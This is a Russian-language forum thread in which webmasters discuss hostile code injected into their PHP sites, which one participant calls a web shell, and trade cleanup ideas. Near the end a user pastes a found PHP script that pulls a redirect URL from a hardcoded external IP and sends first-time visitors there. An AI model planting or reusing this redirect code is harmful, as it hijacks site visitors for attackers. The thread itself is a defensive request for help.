"левый" код в .php файлах

285
.
(\/)____o_O____(\/)
не лезет в пост
Прикрепленные файлы:
.
(\/)____o_O____(\/)
Blade, ужас какой то, что не разобрать так с первого раза, что за беда
.
The Frontend-Warrior
Koenig, это шелл походу, там есть функция, внутри которой открывается листинг директории. глянь в моем файле на строке 494 функцию F7A0DC6FCF5A00BB584F0024BBAC75D65
.
(\/)____o_O____(\/)
Blade, интересно как такую бороду поймать, чистить думаюбудет долго и нудно, если в двиге около 1000 файлов
.
The Frontend-Warrior
Koenig, как вариант написать скрипт рекурсивной функции вывода последнего изменения файла. а потом сверить с датой создания сайта (хотя бы по дате регистрации админа в базе) и вспомнить, какие модули ставил.
.
нарыл лекарство вроде помогает
Прикрепленные файлы:
.
Sensus veris
Blade (10.09.2012/17:23)
снесите эти два поста, файлы есть в теме
Надеюсь, те снесла...
.
mi3ry (10.09.2012/17:49)
нарыл лекарство вроде помогает
Антивирь пхп
.
на сайте который на джоне 3.2.2 тоже заметил этот код
.
(\/)____o_O____(\/)
сейчас на хосте нарыл файл
<?php

set_time_limit(30);

$cache = dirname(__FILE__) . '/link.cache';

$link = @file_get_contents($cache);

if (strlen($link) < 20 || (time()-@filemtime($cache)) > 60)
{
 $link = @file_get_contents('http://78.46.14.162/api.php?action=link&aid=1345&fid=4780&hash=c1120ba44a14664ed80cfa5a18832c1b9b39dec0');

 if (strlen($link) > 20)
 {
 $fp = @fopen ($cache, 'w');
 @fputs($fp, $link);
 @fclose($fp);
 }
}

if (!isset($_COOKIE['traf'])) 
{
SetCookie("traf",'1',time()+86400);
header ('Location: ' . $link);
}

else 
{ 
header ('Location: http://google.com&#039;); 
}


?>

подозрительный скрипт
Всего: 35
Фильтр по автору
Скачать тему